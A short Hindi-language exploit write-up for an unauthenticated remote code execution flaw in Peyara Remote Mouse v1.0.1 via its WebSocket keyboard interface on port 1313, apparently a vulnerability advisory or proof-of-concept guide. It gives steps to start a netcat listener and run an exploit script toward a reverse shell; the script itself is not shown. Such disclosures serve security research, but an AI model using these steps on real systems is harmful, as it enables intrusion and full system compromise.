
Peyara Remote Mouse v1.0.1- रिमोट कोड निष्पादन (RCE)
Peyara Remote Mouse v1.0.1 में अपने WebSocket कमांड इंटरफ़ेस (पोर्ट 1313) में एक अप्रमाणित दूरस्थ कोड निष्पादन भेद्यता है। एप्लिकेशन WebSocket कनेक्शन के माध्यम से प्राप्त सिम्युलेटेड कीबोर्ड इनपुट कमांड को मान्य या स्वच्छ करने में विफल रहता है, जिससे हमलावर दुर्भावनापूर्ण कीबोर्ड ईवेंट को चेन कर सकते हैं जो मनमाना सिस्टम कमांड निष्पादित करते हैं। इस भेद्यता का शोषण बिना प्रमाणीकरण के दूरस्थ रूप से किया जा सकता है ताकि पूर्ण सिस्टम समझौता प्राप्त किया जा सके।
भेद्य एप्लिकेशन स्थापित करें
लक्ष्य Windows सिस्टम पर Peyara Remote Mouse डाउनलोड और इंस्टॉल करें।
Netcat लिसनर प्रारंभ करें
एक टर्मिनल खोलें और निष्पादित करें:
nc -nlvp 4444
एक्सप्लॉइट स्क्रिप्ट निष्पादित करें
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

